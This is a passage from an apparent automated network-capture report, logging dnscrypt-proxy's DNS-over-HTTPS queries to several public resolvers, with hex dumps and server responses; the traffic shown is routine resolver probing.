                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 79
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:33:36 UTC79OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 10 6c 66 69 6f 76 73 6e 7a 6a 73 77 62 63 6a 78 6c 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 aa ac 7a 4e 6e ed 0a f0 81 2b f3 90 32 e7 3b 77
                                                                                                                            Data Ascii: lfiovsnzjswbcjxltestdnscrypt)zNn+2;w
                                                                                                                            2024-03-12 15:33:36 UTC166INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                            Date: Tue, 12 Mar 2024 15:33:36 GMT
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Content-Length: 134
                                                                                                                            Connection: close
                                                                                                                            2024-03-12 15:33:36 UTC134INData Raw: ca fe 81 83 00 01 00 00 00 01 00 01 10 6c 66 69 6f 76 73 6e 7a 6a 73 77 62 63 6a 78 6c 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 06 00 01 00 00 00 bc 00 40 01 61 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 05 6e 73 74 6c 64 0c 76 65 72 69 73 69 67 6e 2d 67 72 73 03 63 6f 6d 00 78 a4 43 e0 00 00 07 08 00 00 03 84 00 09 3a 80 00 01 51 80 00 00 29 04 d0 00 00 00 00 00 00
                                                                                                                            Data Ascii: lfiovsnzjswbcjxltestdnscrypt@aroot-serversnetnstldverisign-grscomxC:Q)


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            34192.168.2.549769207.246.87.964437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:33:37 UTC277OUTPOST /dns-query?body_hash=540bd08e1b8569d15733e05bf790a0aa53f535f759c0f37a33c4aa332d262aaf HTTP/1.1
                                                                                                                            Host: kronos.plan9-dns.com
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 48
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:33:37 UTC48OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 12 b0 79 96 b6 1c cc 89 84 3b 3c 89 37 87 03 af
                                                                                                                            Data Ascii: )y;<7
                                                                                                                            2024-03-12 15:33:37 UTC47INHTTP/1.1 400 Bad Request
                                                                                                                            Connection: Close
                                                                                                                            2024-03-12 15:33:37 UTC147INData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 54 68 69 73 20 73 65 72 76 65 72 20 69 6d 70 6c 65 6d 65 6e 74 73 20 52 46 43 20 38 34 38 34 20 2d 20 44 4e 53 20 51 75 65 72 69 65 73 20 6f 76 65 72 20 48 54 54 50 2c 20 61 6e 64 20 72 65 71 75 69 72 65 73 20 48 54 54 50 2f 32 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 73 65 63 74 69 6f 6e 20 35 2e 32 20 6f 66 20 74 68 65 20 52 46 43 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><body>This server implements RFC 8484 - DNS Queries over HTTP, and requires HTTP/2 in accordance with section 5.2 of the RFC.</body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            35192.168.2.549770207.246.87.964437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:33:37 UTC211OUTGET /dns-query?dns=yv4BAAABAAAAAAABAAACAAEAACkQAAAAAAAAFAAMABASsHmWthzMiYQ7PIk3hwOv HTTP/1.1
                                                                                                                            Host: kronos.plan9-dns.com
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            2024-03-12 15:33:37 UTC47INHTTP/1.1 400 Bad Request
                                                                                                                            Connection: Close
                                                                                                                            2024-03-12 15:33:37 UTC147INData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 54 68 69 73 20 73 65 72 76 65 72 20 69 6d 70 6c 65 6d 65 6e 74 73 20 52 46 43 20 38 34 38 34 20 2d 20 44 4e 53 20 51 75 65 72 69 65 73 20 6f 76 65 72 20 48 54 54 50 2c 20 61 6e 64 20 72 65 71 75 69 72 65 73 20 48 54 54 50 2f 32 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 73 65 63 74 69 6f 6e 20 35 2e 32 20 6f 66 20 74 68 65 20 52 46 43 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><body>This server implements RFC 8484 - DNS Queries over HTTP, and requires HTTP/2 in accordance with section 5.2 of the RFC.</body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            36192.168.2.54977345.90.30.04437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:33:49 UTC279OUTPOST /dns-query?body_hash=305e67268b50cc3a72750429672b0d1bf71f42a82218ce563d19c050cc2205db HTTP/1.1
                                                                                                                            Host: anycast.dns.nextdns.io
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 48
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:33:49 UTC48OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 a9 c7 fa 3a a0 6c f9 db da f8 fc 3f 35 0a 2c ee
                                                                                                                            Data Ascii: ):l?5,
                                                                                                                            2024-03-12 15:33:49 UTC208INHTTP/1.1 200 OK
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                            Date: Tue, 12 Mar 2024 15:33:49 GMT
                                                                                                                            Content-Length: 239
                                                                                                                            Connection: close
                                                                                                                            2024-03-12 15:33:49 UTC239INData Raw: ca fe 81 80 00 01 00 0d 00 00 00 01 00 00 02 00 01 00 00 02 00 01 00 00 92 a6 00 14 01 68 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 92 a6 00 04 01 69 c0 1e 00 00 02 00 01 00 00 92 a6 00 04 01 6a c0 1e 00 00 02 00 01 00 00 92 a6 00 04 01 6b c0 1e 00 00 02 00 01 00 00 92 a6 00 04 01 6c c0 1e 00 00 02 00 01 00 00 92 a6 00 04 01 6d c0 1e 00 00 02 00 01 00 00 92 a6 00 04 01 61 c0 1e 00 00 02 00 01 00 00 92 a6 00 04 01 62 c0 1e 00 00 02 00 01 00 00 92 a6 00 04 01 63 c0 1e 00 00 02 00 01 00 00 92 a6 00 04 01 64 c0 1e 00 00 02 00 01 00 00 92 a6 00 04 01 65 c0 1e 00 00 02 00 01 00 00 92 a6 00 04 01 66 c0 1e 00 00 02 00 01 00 00 92 a6 00 04 01 67 c0 1e 00 00 29 04 d0 00 00 00 00 00 00
                                                                                                                            Data Ascii: hroot-serversnetijklmabcdefg)


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            37192.168.2.54977445.90.30.04437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:33:49 UTC279OUTPOST /dns-query?body_hash=134bebe70bcedc55d14ad9a346ef457a584504cf49384fa446b86d635f36c6c5 HTTP/1.1
                                                                                                                            Host: anycast.dns.nextdns.io
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 79
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:33:49 UTC79OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 10 6f 71 70 67 76 70 73 66 76 63 79 6d 78 63 77 65 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 0b 48 a0 f6 cb ab fa d3 ff 31 a2 b1 19 77 a8 65
                                                                                                                            Data Ascii: oqpgvpsfvcymxcwetestdnscrypt)H1we
                                                                                                                            2024-03-12 15:33:49 UTC208INHTTP/1.1 200 OK
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                            Date: Tue, 12 Mar 2024 15:33:49 GMT
                                                                                                                            Content-Length: 134
                                                                                                                            Connection: close
                                                                                                                            2024-03-12 15:33:49 UTC134INData Raw: ca fe 81 83 00 01 00 00 00 01 00 01 10 6f 71 70 67 76 70 73 66 76 63 79 6d 78 63 77 65 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 06 00 01 00 00 05 72 00 40 01 61 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 05 6e 73 74 6c 64 0c 76 65 72 69 73 69 67 6e 2d 67 72 73 03 63 6f 6d 00 78 a4 43 e0 00 00 07 08 00 00 03 84 00 09 3a 80 00 01 51 80 00 00 29 04 d0 00 00 00 00 00 00
                                                                                                                            Data Ascii: oqpgvpsfvcymxcwetestdnscryptr@aroot-serversnetnstldverisign-grscomxC:Q)


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            38192.168.2.549775104.21.6.784437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:33:51 UTC270OUTPOST /dns-query?body_hash=7283a987661a37933060b33e877ff7234cb4c871972a5fa1997ea3275548fdc0 HTTP/1.1
                                                                                                                            Host: doh.crypto.sx
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 48
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:33:51 UTC48OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 c9 aa 19 5d 68 19 78 91 67 7e 33 f5 92 56 49 bb
                                                                                                                            Data Ascii: )]hxg~3VI
                                                                                                                            2024-03-12 15:33:51 UTC566INHTTP/1.1 405 Method Not Allowed
                                                                                                                            Date: Tue, 12 Mar 2024 15:33:51 GMT
                                                                                                                            Content-Length: 0
                                                                                                                            Connection: close
                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3BmlMFpXG1NVVfUBuZrG9StAKHalJuK%2FOHqLkCb4bfRxrvFTY92pPp7Kenw1vaW64hBdM2932pg93Ct4VL%2FT7jmClyWsAZy1GB4l5X4DdINywtZBhiEVowg3ylwo75wJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8634d853aa654273-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            39192.168.2.549776104.21.6.784437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:33:51 UTC204OUTGET /dns-query?dns=yv4BAAABAAAAAAABAAACAAEAACkQAAAAAAAAFAAMABDJqhldaBl4kWd-M_WSVkm7 HTTP/1.1
                                                                                                                            Host: doh.crypto.sx
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            2024-03-12 15:33:52 UTC769INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 12 Mar 2024 15:33:52 GMT
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Content-Length: 260
                                                                                                                            Connection: close
                                                                                                                            cache-control: max-age=67461, stale-if-error=86400, stale-while-revalidate=60
                                                                                                                            access-control-allow-origin: *
                                                                                                                            CF-Cache-Status: MISS
                                                                                                                            Last-Modified: Tue, 12 Mar 2024 15:33:52 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LyebFNrzDY1vc%2FxYxz6hmnL8qo4evp0NQM94SwKRIRmgXODzqxGdPG4nyiN6qjtqCQl0c3PYmQtKKwTxHXZInp%2BYzAys3jDilZAXTGWFWxvMlZaN0yjzi2%2BeCGBJEnPN"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8634d85758cc17ad-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            2024-03-12 15:33:52 UTC260INData Raw: ca fe 81 80 00 01 00 0d 00 00 00 01 00 00 02 00 01 00 00 02 00 01 00 01 07 85 00 14 01 6b 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 01 07 85 00 04 01 6c c0 1e 00 00 02 00 01 00 01 07 85 00 04 01 6d c0 1e 00 00 02 00 01 00 01 07 85 00 04 01 61 c0 1e 00 00 02 00 01 00 01 07 85 00 04 01 62 c0 1e 00 00 02 00 01 00 01 07 85 00 04 01 63 c0 1e 00 00 02 00 01 00 01 07 85 00 04 01 64 c0 1e 00 00 02 00 01 00 01 07 85 00 04 01 65 c0 1e 00 00 02 00 01 00 01 07 85 00 04 01 66 c0 1e 00 00 02 00 01 00 01 07 85 00 04 01 67 c0 1e 00 00 02 00 01 00 01 07 85 00 04 01 68 c0 1e 00 00 02 00 01 00 01 07 85 00 04 01 69 c0 1e 00 00 02 00 01 00 01 07 85 00 04 01 6a c0 1e 00 00 29 04 d0 00 00 00 00 00 15 00 0c 00 11 58 58 58 58 58 58 58 58 58 58 58 58
                                                                                                                            Data Ascii: kroot-serversnetlmabcdefghij)XXXXXXXXXXXX


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            40192.168.2.549777104.21.6.784437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:33:52 UTC246OUTGET /dns-query?dns=yv4BAAABAAAAAAABEGNra215cXZveGpwZHh4ZXEEdGVzdAhkbnNjcnlwdAAAAgABAAApEAAAAAAAABQADAAQDt0GKHhHtLhiC_vFFWAAwQ HTTP/1.1
                                                                                                                            Host: doh.crypto.sx
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            2024-03-12 15:33:52 UTC774INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 12 Mar 2024 15:33:52 GMT
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Content-Length: 196
                                                                                                                            Connection: close
                                                                                                                            cache-control: max-age=3600, stale-if-error=86400, stale-while-revalidate=60
                                                                                                                            access-control-allow-origin: *
                                                                                                                            CF-Cache-Status: MISS
                                                                                                                            Last-Modified: Tue, 12 Mar 2024 15:33:52 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=88%2BBH%2BIsTPqJPkx4raynI0nXWXeBnLoluuq17wgDZ9MOd%2FdBH0NwaUBeQ6qrjQVOvlShPR3syc1tPGRfWiNzdE24w%2Fu3qh6dYQol0d6VppyWBODVtL%2ByBgwU%2BiSIwWqV"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8634d85b1f54c47a-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            2024-03-12 15:33:52 UTC196INData Raw: ca fe 81 83 00 01 00 00 00 01 00 01 10 63 6b 6b 6d 79 71 76 6f 78 6a 70 64 78 78 65 71 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 06 00 01 00 00 00 b5 00 40 01 61 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 05 6e 73 74 6c 64 0c 76 65 72 69 73 69 67 6e 2d 67 72 73 03 63 6f 6d 00 78 a4 43 e0 00 00 07 08 00 00 03 84 00 09 3a 80 00 01 51 80 00 00 29 04 d0 00 00 00 00 00 3e 00 0c 00 3a 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58
                                                                                                                            Data Ascii: ckkmyqvoxjpdxxeqtestdnscrypt@aroot-serversnetnstldverisign-grscomxC:Q)>:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            41192.168.2.54977894.140.14.1404437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:33:53 UTC283OUTPOST /dns-query?body_hash=37a8a6eadf70818531955c8034e34d4cb117dccda052a27e07a645a257424462 HTTP/1.1
                                                                                                                            Host: dns-unfiltered.adguard.com
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 48
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:33:53 UTC48OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 5d cb 2b d3 5a 87 07 ab d0 d5 20 24 23 b7 26 bf
                                                                                                                            Data Ascii: )]+Z $#&
                                                                                                                            2024-03-12 15:33:53 UTC171INHTTP/1.1 200 OK
                                                                                                                            Cache-Control: max-age=3600.000000
                                                                                                                            Content-Length: 248
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Date: Tue, 12 Mar 2024 15:33:53 GMT
                                                                                                                            Connection: close
                                                                                                                            2024-03-12 15:33:53 UTC248INData Raw: ca fe 81 80 00 01 00 0d 00 00 00 01 00 00 02 00 01 00 00 02 00 01 00 00 c4 3c 00 14 01 65 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 c4 3c 00 04 01 66 c0 1e 00 00 02 00 01 00 00 c4 3c 00 04 01 67 c0 1e 00 00 02 00 01 00 00 c4 3c 00 04 01 68 c0 1e 00 00 02 00 01 00 00 c4 3c 00 04 01 69 c0 1e 00 00 02 00 01 00 00 c4 3c 00 04 01 6a c0 1e 00 00 02 00 01 00 00 c4 3c 00 04 01 6b c0 1e 00 00 02 00 01 00 00 c4 3c 00 04 01 6c c0 1e 00 00 02 00 01 00 00 c4 3c 00 04 01 6d c0 1e 00 00 02 00 01 00 00 c4 3c 00 04 01 61 c0 1e 00 00 02 00 01 00 00 c4 3c 00 04 01 62 c0 1e 00 00 02 00 01 00 00 c4 3c 00 04 01 63 c0 1e 00 00 02 00 01 00 00 c4 3c 00 04 01 64 c0 1e 00 00 29 00 00 00 00 00 00 00 09 00 0c 00 05 00 00 00 00 00
                                                                                                                            Data Ascii: <eroot-serversnet<f<g<h<i<j<k<l<m<a<b<c<d)


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            42192.168.2.54977994.140.14.1404437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:33:53 UTC283OUTPOST /dns-query?body_hash=839aaf9c2a22941141366a8c7649e634f7f9d2b7af14e9d2e42d2359492fba34 HTTP/1.1
                                                                                                                            Host: dns-unfiltered.adguard.com
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 79
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:33:53 UTC79OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 10 63 74 68 76 66 62 78 6e 6f 66 6b 6d 72 63 64 64 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 30 2c 03 3f 00 cd d2 a7 ec 35 5a 95 75 01 76 7b
                                                                                                                            Data Ascii: cthvfbxnofkmrcddtestdnscrypt)0,?5Zuv{
                                                                                                                            2024-03-12 15:33:53 UTC171INHTTP/1.1 200 OK
                                                                                                                            Cache-Control: max-age=3600.000000
                                                                                                                            Content-Length: 165
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Date: Tue, 12 Mar 2024 15:33:53 GMT
                                                                                                                            Connection: close
                                                                                                                            2024-03-12 15:33:53 UTC165INData Raw: ca fe 81 83 00 01 00 00 00 01 00 01 10 63 74 68 76 66 62 78 6e 6f 66 6b 6d 72 63 64 64 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 06 00 01 00 00 0e 10 00 40 01 61 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 05 6e 73 74 6c 64 0c 76 65 72 69 73 69 67 6e 2d 67 72 73 03 63 6f 6d 00 78 a4 43 e0 00 00 07 08 00 00 03 84 00 09 3a 80 00 01 51 80 00 00 29 00 00 00 00 00 00 00 1f 00 0c 00 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: cthvfbxnofkmrcddtestdnscrypt@aroot-serversnetnstldverisign-grscomxC:Q)


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            43192.168.2.54978176.76.2.114437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:33:59 UTC212OUTGET /uncensored?dns=yv4BAAABAAAAAAABAAACAAEAACkQAAAAAAAAFAAMABBNfPoC5RoTTtsv3or0O7VP HTTP/1.1
                                                                                                                            Host: freedns.controld.com
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            2024-03-12 15:33:59 UTC167INHTTP/1.1 200 OK
                                                                                                                            Accept: application/dns-message
                                                                                                                            Content-Length: 17
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Date: Tue, 12 Mar 2024 15:33:59 GMT
                                                                                                                            Connection: close
                                                                                                                            2024-03-12 15:33:59 UTC17INData Raw: ca fe 81 85 00 01 00 00 00 00 00 00 00 00 02 00 01
                                                                                                                            Data Ascii:


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            44192.168.2.54978276.76.2.114437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:33:59 UTC254OUTGET /uncensored?dns=yv4BAAABAAAAAAABEHN2dGxyZ3d5dHVqcmJ1cWMEdGVzdAhkbnNjcnlwdAAAAgABAAApEAAAAAAAABQADAAQi6WE31TBzdqqVCvG8H3FAg HTTP/1.1
                                                                                                                            Host: freedns.controld.com
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            2024-03-12 15:33:59 UTC167INHTTP/1.1 200 OK
                                                                                                                            Accept: application/dns-message
                                                                                                                            Content-Length: 48
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Date: Tue, 12 Mar 2024 15:33:59 GMT
                                                                                                                            Connection: close
                                                                                                                            2024-03-12 15:33:59 UTC48INData Raw: ca fe 81 85 00 01 00 00 00 00 00 00 10 73 76 74 6c 72 67 77 79 74 75 6a 72 62 75 71 63 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01
                                                                                                                            Data Ascii: svtlrgwytujrbuqctestdnscrypt


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            45192.168.2.549785149.28.101.1194437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:34:11 UTC277OUTPOST /dns-query?body_hash=56a7a75091a307bd4d810d917f8975face7537ae0d783145cea1eb749602262e HTTP/1.1
                                                                                                                            Host: pluton.plan9-dns.com
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 48
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:34:11 UTC48OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 69 68 21 a7 87 94 8e 19 d8 46 6f 69 83 7f c1 db
                                                                                                                            Data Ascii: )ih!Foi
                                                                                                                            2024-03-12 15:34:11 UTC47INHTTP/1.1 400 Bad Request
                                                                                                                            Connection: Close
                                                                                                                            2024-03-12 15:34:11 UTC147INData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 54 68 69 73 20 73 65 72 76 65 72 20 69 6d 70 6c 65 6d 65 6e 74 73 20 52 46 43 20 38 34 38 34 20 2d 20 44 4e 53 20 51 75 65 72 69 65 73 20 6f 76 65 72 20 48 54 54 50 2c 20 61 6e 64 20 72 65 71 75 69 72 65 73 20 48 54 54 50 2f 32 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 73 65 63 74 69 6f 6e 20 35 2e 32 20 6f 66 20 74 68 65 20 52 46 43 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><body>This server implements RFC 8484 - DNS Queries over HTTP, and requires HTTP/2 in accordance with section 5.2 of the RFC.</body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            46192.168.2.549786149.28.101.1194437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:34:11 UTC211OUTGET /dns-query?dns=yv4BAAABAAAAAAABAAACAAEAACkQAAAAAAAAFAAMABBpaCGnh5SOGdhGb2mDf8Hb HTTP/1.1
                                                                                                                            Host: pluton.plan9-dns.com
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            2024-03-12 15:34:12 UTC47INHTTP/1.1 400 Bad Request
                                                                                                                            Connection: Close
                                                                                                                            2024-03-12 15:34:12 UTC147INData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 54 68 69 73 20 73 65 72 76 65 72 20 69 6d 70 6c 65 6d 65 6e 74 73 20 52 46 43 20 38 34 38 34 20 2d 20 44 4e 53 20 51 75 65 72 69 65 73 20 6f 76 65 72 20 48 54 54 50 2c 20 61 6e 64 20 72 65 71 75 69 72 65 73 20 48 54 54 50 2f 32 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 73 65 63 74 69 6f 6e 20 35 2e 32 20 6f 66 20 74 68 65 20 52 46 43 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><body>This server implements RFC 8484 - DNS Queries over HTTP, and requires HTTP/2 in accordance with section 5.2 of the RFC.</body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            47192.168.2.54978789.233.43.714437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:34:12 UTC282OUTPOST /dns-query?body_hash=037119eb6630aa8e0fc46a162eb5b6855856cec6ba629447e2571e27bb03d6ed HTTP/1.1
                                                                                                                            Host: unicast.uncensoreddns.org
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 48
